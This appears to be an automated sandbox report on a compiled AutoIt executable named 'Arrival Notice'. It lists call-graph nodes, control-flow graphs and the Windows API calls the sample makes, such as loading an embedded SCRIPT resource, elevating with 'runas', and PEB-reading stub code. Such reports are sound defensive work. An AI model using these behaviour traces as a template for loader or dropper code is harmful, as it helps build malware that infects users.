101292->101294 101293 8fd8a1 GetStartupInfoW 101297 8fd9e5 101293->101297 101299 8fd8b6 101293->101299 101294->101293 101295 8fd841 __write @_EH4_CallFilterFunc@8 101294->101295 101295->101240 101296 8fdaad 101383 8fdabd LeaveCriticalSection _doexit 101296->101383 101297->101296 101301 8fda32 GetStdHandle 101297->101301 101303 8fda45 GetFileType 101297->101303 101382 8fa06b InitializeCriticalSectionAndSpinCount 101297->101382 101299->101297 101300 8f8a15 __calloc_crt 58 API calls 101299->101300 101302 8fd904 101299->101302 101300->101299 101301->101297 101302->101297 101304 8fd938 GetFileType 101302->101304 101381 8fa06b InitializeCriticalSectionAndSpinCount 101302->101381 101303->101297 101304->101302 101308 905184 101307->101308 101309 8f7f43 101307->101309 101384 8f8a5d 58 API calls 2 library calls 101308->101384 101313 904d6b GetModuleFileNameW 101309->101313 101311 9051c0 FreeEnvironmentStringsW 101311->101309 101312 9051aa _memmove 101312->101311 101314 904d9f _wparse_cmdline 101313->101314 101316 904ddf _wparse_cmdline 101314->101316 101385 8f8a5d 58 API calls 2 library calls 101314->101385 101316->101247 101318 904fb9 101317->101318 101320 904fc1 __NMSG_WRITE 101317->101320 101318->101251 101319 8f8a15 __calloc_crt 58 API calls 101327 904fea __NMSG_WRITE 101319->101327 101320->101319 101321 905041 101322 8f2f95 _free 58 API calls 101321->101322 101322->101318 101323 8f8a15 __calloc_crt 58 API calls 101323->101327 101324 905066 101325 8f2f95 _free 58 API calls 101324->101325 101325->101318 101327->101318 101327->101321 101327->101323 101327->101324 101328 90507d 101327->101328 101386 904857 58 API calls _W_expandtime 101327->101386 101387 8f9006 IsProcessorFeaturePresent 101328->101387 101330 905089 101330->101251 101333 8f333b __IsNonwritableInCurrentImage 101331->101333 101402 8fa711 101333->101402 101334 8f3359 __initterm_e 101335 8f2f80 __cinit 67 API calls 101334->101335 101336 8f3378 _doexit __IsNonwritableInCurrentImage 101334->101336 101335->101336 101336->101255 101338 8d4948 101337->101338 101348 8d49e7 101337->101348 101339 8d4982 IsThemeActive 101338->101339 101405 8f35ac 101339->101405 101343 8d49ae 101417 8d4a5b SystemParametersInfoW SystemParametersInfoW 101343->101417 101345 8d49ba 101418 8d3b4c 101345->101418 101347 8d49c2 SystemParametersInfoW 101347->101348 101348->101259 101349->101233 101350->101237 101351->101245 101355->101260 101356->101263 101357->101269 101358->101271 101359->101275 101360->101276 101364 8f8a1c 101361->101364 101363 8f8a57 101363->101280 101367 8fa026 TlsSetValue 101363->101367 101364->101363 101366 8f8a3a 101364->101366 101370 905446 101364->101370 101366->101363 101366->101364 101378 8fa372 Sleep 101366->101378 101367->101284 101368->101287 101369->101283 101371 905451 101370->101371 101376 90546c 101370->101376 101372 90545d 101371->101372 101371->101376 101379 8f8d68 58 API calls __getptd_noexit 101372->101379 101374 90547c HeapAlloc 101374->101376 101377 905462 101374->101377 101376->101374 101376->101377 101380 8f35e1 DecodePointer 101376->101380 101377->101364 101378->101366 101379->101377 101380->101376 101381->101302 101382->101297 101383->101295 101384->101312 101385->101316 101386->101327 101388 8f9011 101387->101388 101393 8f8e99 101388->101393 101392 8f902c 101392->101330 101394 8f8eb3 _memset __call_reportfault 101393->101394 101395 8f8ed3 IsDebuggerPresent 101394->101395 101401 8fa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 101395->101401 101397 8fc836 __fputwc_nolock 6 API calls 101399 8f8fba 101397->101399 101398 8f8f97 __call_reportfault 101398->101397 101400 8fa380 GetCurrentProcess TerminateProcess 101399->101400 101400->101392 101401->101398 101403 8fa714 EncodePointer 101402->101403 101403->101403 101404 8fa72e 101403->101404 101404->101334 101406 8f9e4b __lock 58 API calls 101405->101406 101407 8f35b7 DecodePointer EncodePointer 101406->101407 101470 8f9fb5 LeaveCriticalSection 101407->101470 101409 8d49a7 101410 8f3614 101409->101410 101411 8f361e 101410->101411 101412 8f3638 101410->101412 101411->101412 101471 8f8d68 58 API calls __getptd_noexit 101411->101471 101412->101343 101414 8f3628 101472 8f8ff6 9 API calls _W_expandtime 101414->101472 101416 8f3633 101416->101343 101417->101345 101419 8d3b59 __write_nolock 101418->101419 101420 8d77c7 59 API calls 101419->101420 101421 8d3b63 GetCurrentDirectoryW 101420->101421 101473 8d3778 101421->101473 101423 8d3b8c IsDebuggerPresent 101424 8d3b9a 101423->101424 101425 90d4ad MessageBoxA 101423->101425 101427 90d4c7 101424->101427 101428 8d3bb7 101424->101428 101460 8d3c73 101424->101460 101425->101427 101426 8d3c7a SetCurrentDirectoryW 101429 8d3c87 Mailbox 101426->101429 101683 8d7373 59 API calls Mailbox 101427->101683 101554 8d73e5 101428->101554 101429->101347 101432 90d4d7 101437 90d4ed SetCurrentDirectoryW 101432->101437 101437->101429 101460->101426 101470->101409 101471->101414 101472->101416 101474 8d77c7 59 API calls 101473->101474 101475 8d378e 101474->101475 101685 8d3d43 101475->101685 101477 8d37ac 101478 8d4864 61 API calls 101477->101478 101479 8d37c0 101478->101479 101480 8d7f41 59 API calls 101479->101480 101481 8d37cd 101480->101481 101482 8d4f3d 136 API calls 101481->101482 101483 8d37e6 101482->101483 101484 8d37ee Mailbox 101483->101484 101485 90d3ae 101483->101485 101488 8d81a7 59 API calls 101484->101488 101727 9397e5 101485->101727 101491 8d3801 101488->101491 101489 90d3cd 101490 8f2f95 _free 58 API calls 101489->101490 101493 90d3da 101490->101493 101699 8d93ea 101491->101699 101492 8d4faa 84 API calls 101492->101489 101495 8d4faa 84 API calls 101493->101495 101497 90d3e3 101495->101497 101501 8d3ee2 59 API calls 101497->101501 101498 8d7f41 59 API calls 101499 8d381a 101498->101499 101500 8d8620 69 API calls 101499->101500 101502 8d382c Mailbox 101500->101502 101503 90d3fe 101501->101503 101504 8d7f41 59 API calls 101502->101504 101505 8d3ee2 59 API calls 101503->101505 101506 8d3852 101504->101506 101507 90d41a 101505->101507 101508 8d8620 69 API calls 101506->101508 101509 8d4864 61 API calls 101507->101509 101511 8d3861 Mailbox 101508->101511 101510 90d43f 101509->101510 101512 8d3ee2 59 API calls 101510->101512 101514 8d77c7 59 API calls 101511->101514 101513 90d44b 101512->101513 101515 8d81a7 59 API calls 101513->101515 101516 8d387f 101514->101516 101517 90d459 101515->101517 101702 8d3ee2 101516->101702 101519 8d3ee2 59 API calls 101517->101519 101521 90d468 101519->101521 101527 8d81a7 59 API calls 101521->101527 101523 8d3899 101523->101497 101524 8d38a3 101523->101524 101525 8f313d _W_store_winword 60 API calls 101524->101525 101526 8d38ae 101525->101526 101526->101503 101528 8d38b8 101526->101528 101529 90d48a 101527->101529 101530 8f313d _W_store_winword 60 API calls 101528->101530 101531 8d3ee2 59 API calls 101529->101531 101532 8d38c3 101530->101532 101533 90d497 101531->101533 101532->101507 101534 8d38cd 101532->101534 101533->101533 101535 8f313d _W_store_winword 60 API calls 101534->101535 101536 8d38d8 101535->101536 101536->101521 101537 8d3919 101536->101537 101539 8d3ee2 59 API calls 101536->101539 101537->101521 101538 8d3926 101537->101538 101541 8d942e 59 API calls 101538->101541 101540 8d38fc 101539->101540 101542 8d81a7 59 API calls 101540->101542 101543 8d3936 101541->101543 101544 8d390a 101542->101544 101545 8d91b0 59 API calls 101543->101545 101546 8d3ee2 59 API calls 101544->101546 101547 8d3944 101545->101547 101546->101537 101718 8d9040 101547->101718 101549 8d93ea 59 API calls 101551 8d3961 101549->101551 101550 8d9040 60 API calls 101550->101551 101551->101549 101551->101550 101552 8d3ee2 59 API calls 101551->101552 101553 8d39a7 Mailbox 101551->101553 101552->101551 101553->101423 101555 8d73f2 __write_nolock 101554->101555 101556 8d740b 101555->101556 101557 90ee4b _memset 101555->101557 101558 8d48ae 60 API calls 101556->101558 101559 90ee67 GetOpenFileNameW 101557->101559 101560 8d7414 101558->101560 101561 90eeb6 101559->101561 101767 8f09d5 101560->101767 101563 8d7d2c 59 API calls 101561->101563 101565 90eecb 101563->101565 101565->101565 101683->101432 101686 8d3d50 __write_nolock 101685->101686 101687 8d7d2c 59 API calls 101686->101687 101692 8d3eb6 Mailbox 101686->101692 101689 8d3d82 101687->101689 101688 8d7b52 59 API calls 101688->101689 101689->101688 101695 8d3db8 Mailbox 101689->101695 101690 8d3e89 101691 8d7f41 59 API calls 101690->101691 101690->101692 101694 8d3eaa 101691->101694 101692->101477 101693 8d7f41 59 API calls 101693->101695 101696 8d3f84 59 API calls 101694->101696 101695->101690 101695->101692 101695->101693 101697 8d3f84 59 API calls 101695->101697 101698 8d7b52 59 API calls 101695->101698 101696->101692 101697->101695 101698->101695 101700 8f0ff6 Mailbox 59 API calls 101699->101700 101701 8d380d 101700->101701 101701->101498 101703 8d3eec 101702->101703 101704 8d3f05 101702->101704 101706 8d81a7 59 API calls 101703->101706 101705 8d7d2c 59 API calls 101704->101705 101707 8d388b 101705->101707 101706->101707 101708 8f313d 101707->101708 101709 8f31be 101708->101709 101711 8f3149 101708->101711 101764 8f31d0 60 API calls 3 library calls 101709->101764 101717 8f316e 101711->101717 101762 8f8d68 58 API calls __getptd_noexit 101711->101762 101712 8f31cb 101712->101523 101714 8f3155 101763 8f8ff6 9 API calls _W_expandtime 101714->101763 101716 8f3160 101716->101523 101717->101523 101719 90f5a5 101718->101719 101723 8d9057 101718->101723 101719->101723 101766 8d8d3b 59 API calls Mailbox 101719->101766 101721 8d9158 101724 8f0ff6 Mailbox 59 API calls 101721->101724 101722 8d91a0 101765 8d9e9c 60 API calls Mailbox 101722->101765 101723->101721 101723->101722 101726 8d915f 101723->101726 101724->101726 101726->101551 101728 8d5045 85 API calls 101727->101728 101729 939854 101728->101729 101730 9399be 96 API calls 101729->101730 101731 939866 101730->101731 101732 8d506b 74 API calls 101731->101732 101760 90d3c1 101731->101760 101733 939881 101732->101733 101734 8d506b 74 API calls 101733->101734 101735 939891 101734->101735 101736 8d506b 74 API calls 101735->101736 101737 9398ac 101736->101737 101738 8d506b 74 API calls 101737->101738 101739 9398c7 101738->101739 101740 8d5045 85 API calls 101739->101740 101741 9398de 101740->101741 101742 8f594c __crtCompareStringA_stat 58 API calls 101741->101742 101743 9398e5 101742->101743 101744 8f594c __crtCompareStringA_stat 58 API calls 101743->101744 101745 9398ef 101744->101745 101746 8d506b 74 API calls 101745->101746 101747 939903 101746->101747 101748 939393 GetSystemTimeAsFileTime 101747->101748 101749 939916 101748->101749 101750 939940 101749->101750 101751 93992b 101749->101751 101753 939946 101750->101753 101754 9399a5 101750->101754 101752 8f2f95 _free 58 API calls 101751->101752 101755 939931 101752->101755 101756 938d90 116 API calls 101753->101756 101757 8f2f95 _free 58 API calls 101754->101757 101758 8f2f95 _free 58 API calls 101755->101758 101759 93999d 101756->101759 101757->101760 101758->101760 101761 8f2f95 _free 58 API calls 101759->101761 101760->101489 101760->101492 101761->101760 101762->101714 101763->101716 101764->101712 101765->101726 101766->101723 101768 901b90 __write_nolock 101767->101768 101769 8f09e2 GetLongPathNameW 101768->101769 101770 8d7d2c 59 API calls 101769->101770 101771 8d741d 101770->101771 101772 8d716b 101771->101772 101773 8d77c7 59 API calls 101772->101773 101774 8d717d 101773->101774 101775 8d48ae 60 API calls 101774->101775 101776 8d7188 101775->101776 101777 90ecae 101776->101777 101778 8d7193 101776->101778 101783 90ecc8 101777->101783 101825 8d7a68 61 API calls 101777->101825 101780 8d3f84 59 API calls 101778->101780 101781 8d719f 101780->101781 101825->101777 102069 14c23b0 102083 14c0000 102069->102083 102071 14c245a 102086 14c22a0 102071->102086 102089 14c34a0 GetPEB 102083->102089 102085 14c068b 102085->102071 102087 14c22a9 Sleep 102086->102087 102088 14c22b7 102087->102088 102090 14c34ca 102089->102090 102090->102085 102091 8d3633 102092 8d366a 102091->102092 102093 8d3688 102092->102093 102094 8d36e7 102092->102094 102135 8d36e5 102092->102135 102095 8d375d PostQuitMessage 102093->102095 102096 8d3695 102093->102096 102098 8d36ed 102094->102098 102099 90d31c 102094->102099 102131 8d36d8 102095->102131 102100 8d36a0 102096->102100 102101 90d38f 102096->102101 102097 8d36ca DefWindowProcW 102097->102131 102103 8d3715 SetTimer RegisterWindowMessageW 102098->102103 102104 8d36f2 102098->102104 102141 8e11d0 10 API calls Mailbox 102099->102141 102105 8d36a8 102100->102105 102106 8d3767 102100->102106 102145 932a16 71 API calls _memset 102101->102145 102107 8d373e CreatePopupMenu 102103->102107 102103->102131 102110 8d36f9 KillTimer 102104->102110 102111 90d2bf 102104->102111 102112 90d374 102105->102112 102113 8d36b3 102105->102113 102139 8d4531 64 API calls _memset 102106->102139 102107->102131 102109 90d343 102142 8e11f3 341 API calls Mailbox 102109->102142 102136 8d44cb Shell_NotifyIconW _memset 102110->102136 102117 90d2c4 102111->102117 102118 90d2f8 MoveWindow 102111->102118 102112->102097 102144 92817e 59 API calls Mailbox 102112->102144 102120 8d374b 102113->102120 102129 8d36be 102113->102129 102114 90d3a1 102114->102097 102114->102131 102122 90d2e7 SetFocus 102117->102122 102123 90d2c8 102117->102123 102118->102131 102138 8d45df 81 API calls _memset 102120->102138 102121 8d375b 102121->102131 102122->102131 102128 90d2d1 102123->102128 102123->102129 102124 8d370c 102137 8d3114 DeleteObject DestroyWindow Mailbox 102124->102137 102140 8e11d0 10 API calls Mailbox 102128->102140 102129->102097 102143 8d44cb Shell_NotifyIconW _memset 102129->102143 102133 90d368 102134 8d43db 68 API calls 102133->102134 102134->102135 102135->102097 102136->102124 102137->102131 102138->102121 102139->102121 102140->102131 102141->102109 102142->102129 102143->102133 102144->102135 102145->102114

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008D3B7A
                                              • IsDebuggerPresent.KERNEL32 ref: 008D3B8C
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,009962F8,009962E0,?,?), ref: 008D3BFD
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                • Part of subcall function 008E0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008D3C26,009962F8,?,?,?), ref: 008E0ACE
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008D3C81
                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009893F0,00000010), ref: 0090D4BC
                                              • SetCurrentDirectoryW.KERNEL32(?,009962F8,?,?,?), ref: 0090D4F4
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00985D40,009962F8,?,?,?), ref: 0090D57A
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0090D581
                                                • Part of subcall function 008D3A58: GetSysColorBrush.USER32(0000000F), ref: 008D3A62
                                                • Part of subcall function 008D3A58: LoadCursorW.USER32(00000000,00007F00), ref: 008D3A71
                                                • Part of subcall function 008D3A58: LoadIconW.USER32(00000063), ref: 008D3A88
                                                • Part of subcall function 008D3A58: LoadIconW.USER32(000000A4), ref: 008D3A9A
                                                • Part of subcall function 008D3A58: LoadIconW.USER32(000000A2), ref: 008D3AAC
                                                • Part of subcall function 008D3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008D3AD2
                                                • Part of subcall function 008D3A58: RegisterClassExW.USER32(?), ref: 008D3B28
                                                • Part of subcall function 008D39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008D3A15
                                                • Part of subcall function 008D39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008D3A36
                                                • Part of subcall function 008D39E7: ShowWindow.USER32(00000000,?,?), ref: 008D3A4A
                                                • Part of subcall function 008D39E7: ShowWindow.USER32(00000000,?,?), ref: 008D3A53
                                                • Part of subcall function 008D43DB: _memset.LIBCMT ref: 008D4401
                                                • Part of subcall function 008D43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008D44A6
                                              Strings
                                              • This is a third-party compiled AutoIt script., xrefs: 0090D4B4
                                              • runas, xrefs: 0090D575
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                              • API String ID: 529118366-3287110873
                                              • Opcode ID: 046def99229422ee071543f988b01af946ab4c8ca79663e8ef99edcc76d598ec
                                              • Instruction ID: 65c4441ae71927ce4f8751f39dc76e87115b3ee847cb3d26bfe90c2a2ead4fd2
                                              • Opcode Fuzzy Hash: 046def99229422ee071543f988b01af946ab4c8ca79663e8ef99edcc76d598ec
                                              • Instruction Fuzzy Hash: 1A510130A28248AECF11ABFCDC15EFD7B78FB44354B004267F461E23A1DA744A05EB22

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 942 8d4afe-8d4b5e call 8d77c7 GetVersionExW call 8d7d2c 947 8d4c69-8d4c6b 942->947 948 8d4b64 942->948 949 90db90-90db9c 947->949 950 8d4b67-8d4b6c 948->950 951 90db9d-90dba1 949->951 952 8d4c70-8d4c71 950->952 953 8d4b72 950->953 955 90dba3 951->955 956 90dba4-90dbb0 951->956 954 8d4b73-8d4baa call 8d7e8c call 8d7886 952->954 953->954 964 90dc8d-90dc90 954->964 965 8d4bb0-8d4bb1 954->965 955->956 956->951 958 90dbb2-90dbb7 956->958 958->950 960 90dbbd-90dbc4 958->960 960->949 962 90dbc6 960->962 966 90dbcb-90dbce 962->966 967 90dc92 964->967 968 90dca9-90dcad 964->968 965->966 969 8d4bb7-8d4bc2 965->969 970 90dbd4-90dbf2 966->970 971 8d4bf1-8d4c08 GetCurrentProcess IsWow64Process 966->971 976 90dc95 967->976 972 90dc98-90dca1 968->972 973 90dcaf-90dcb8 968->973 977 90dc13-90dc19 969->977 978 8d4bc8-8d4bca 969->978 970->971 979 90dbf8-90dbfe 970->979 974 8d4c0d-8d4c1e 971->974 975 8d4c0a 971->975 972->968 973->976 982 90dcba-90dcbd 973->982 983 8d4c89-8d4c93 GetSystemInfo 974->983 984 8d4c20-8d4c30 call 8d4c95 974->984 975->974 976->972 980 90dc23-90dc29 977->980 981 90dc1b-90dc1e 977->981 985 8d4bd0-8d4bd3 978->985 986 90dc2e-90dc3a 978->986 987 90dc00-90dc03 979->987 988 90dc08-90dc0e 979->988 980->971 981->971 982->972 991 8d4c56-8d4c66 983->991 999 8d4c7d-8d4c87 GetSystemInfo 984->999 1000 8d4c32-8d4c3f call 8d4c95 984->1000 989 8d4bd9-8d4be8 985->989 990 90dc5a-90dc5d 985->990 992 90dc44-90dc4a 986->992 993 90dc3c-90dc3f 986->993 987->971 988->971 995 8d4bee 989->995 996 90dc4f-90dc55 989->996 990->971 998 90dc63-90dc78 990->998 992->971 993->971 995->971 996->971 1001 90dc82-90dc88 998->1001 1002 90dc7a-90dc7d 998->1002 1003 8d4c47-8d4c4b 999->1003 1007 8d4c76-8d4c7b 1000->1007 1008 8d4c41-8d4c45 GetNativeSystemInfo 1000->1008 1001->971 1002->971 1003->991 1006 8d4c4d-8d4c50 FreeLibrary 1003->1006 1006->991 1007->1008 1008->1003
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 008D4B2B
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                              • GetCurrentProcess.KERNEL32(?,0095FAEC,00000000,00000000,?), ref: 008D4BF8
                                              • IsWow64Process.KERNEL32(00000000), ref: 008D4BFF
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008D4C45
                                              • FreeLibrary.KERNEL32(00000000), ref: 008D4C50
                                              • GetSystemInfo.KERNEL32(00000000), ref: 008D4C81
                                              • GetSystemInfo.KERNEL32(00000000), ref: 008D4C8D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: 07ee9f6c8fce4af37e5db3d13cf470ccd1c34eb12449ce7208ec946752317038
                                              • Instruction ID: 30e5809ee47b0a6bd790d3b694e101fefcb6d028a93846d456da0d63513c05f3
                                              • Opcode Fuzzy Hash: 07ee9f6c8fce4af37e5db3d13cf470ccd1c34eb12449ce7208ec946752317038
                                              • Instruction Fuzzy Hash: 9D91C23154ABC4DFC731DBA885611AABFE4FF36310B485A5FD0CA83B41D631A908D71A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1039 8d4fe9-8d5001 CreateStreamOnHGlobal 1040 8d5021-8d5026 1039->1040 1041 8d5003-8d501a FindResourceExW 1039->1041 1042 90dd5c-90dd6b LoadResource 1041->1042 1043 8d5020 1041->1043 1042->1043 1044 90dd71-90dd7f SizeofResource 1042->1044 1043->1040 1044->1043 1045 90dd85-90dd90 LockResource 1044->1045 1045->1043 1046 90dd96-90dd9e 1045->1046 1047 90dda2-90ddb4 1046->1047 1047->1043
                                              APIs
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008D4EEE,?,?,00000000,00000000), ref: 008D4FF9
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008D4EEE,?,?,00000000,00000000), ref: 008D5010
                                              • LoadResource.KERNEL32(?,00000000,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F), ref: 0090DD60
                                              • SizeofResource.KERNEL32(?,00000000,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F), ref: 0090DD75
                                              • LockResource.KERNEL32(008D4EEE,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F,00000000), ref: 0090DD88
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: 1e92df45b76a691fb45a20654eae8e667f5d0dbb693c6833baf92772bb4a4e2a
                                              • Instruction ID: 34b49a38639d172716ae6060dd402b0f971d653e09ad65016ef3b6ee877ad76b
                                              • Opcode Fuzzy Hash: 1e92df45b76a691fb45a20654eae8e667f5d0dbb693c6833baf92772bb4a4e2a
                                              • Instruction Fuzzy Hash: E7115175240B01BFD7218B66DC58F677BB9FBC5722F108269F415C6290DB61DC009661
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,0090E7C1), ref: 009346A6
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 009346B7
                                              • FindClose.KERNEL32(00000000), ref: 009346C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirst
                                              • String ID:
                                              • API String ID: 48322524-0
                                              • Opcode ID: 24bec2ce910477e1ac34f5ad72e0bbd9d01afc6a3d49ac9be373a6ff1b3ddae6
                                              • Instruction ID: f2b12f135d3a1f32f3a0395324f2d9441e840319271ca6560882ffc1ca8abd4d
                                              • Opcode Fuzzy Hash: 24bec2ce910477e1ac34f5ad72e0bbd9d01afc6a3d49ac9be373a6ff1b3ddae6
                                              • Instruction Fuzzy Hash: 4DE020364245005B52106B38EC5E4EA775CDE0737AF100715F935C20F0E7B06D509BD6
                                              Strings
                                              • Variable must be of type 'Object'., xrefs: 0091428C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable must be of type 'Object'.
                                              • API String ID: 0-109567571
                                              • Opcode ID: a7d5af7e56acf3d545324ecc846a4f34870c426cc6692663cc05f40f89ab774b
                                              • Instruction ID: 26d40d1534554d6b9181985715fe3d1c9cb30b9d4dda2c3d70b415465c441fc4
                                              • Opcode Fuzzy Hash: a7d5af7e56acf3d545324ecc846a4f34870c426cc6692663cc05f40f89ab774b
                                              • Instruction Fuzzy Hash: EAA28D74A04219DFCB24DF58C480AADB7B2FF58314F24866AE916EF351D730AD82DB91
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E0BBB
                                              • timeGetTime.WINMM ref: 008E0E76
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E0FB3
                                              • TranslateMessage.USER32(?), ref: 008E0FC7
                                              • DispatchMessageW.USER32(?), ref: 008E0FD5
                                              • Sleep.KERNEL32(0000000A), ref: 008E0FDF
                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 008E105A
                                              • DestroyWindow.USER32 ref: 008E1066
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008E1080
                                              • Sleep.KERNEL32(0000000A,?,?), ref: 009152AD
                                              • TranslateMessage.USER32(?), ref: 0091608A
                                              • DispatchMessageW.USER32(?), ref: 00916098
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009160AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
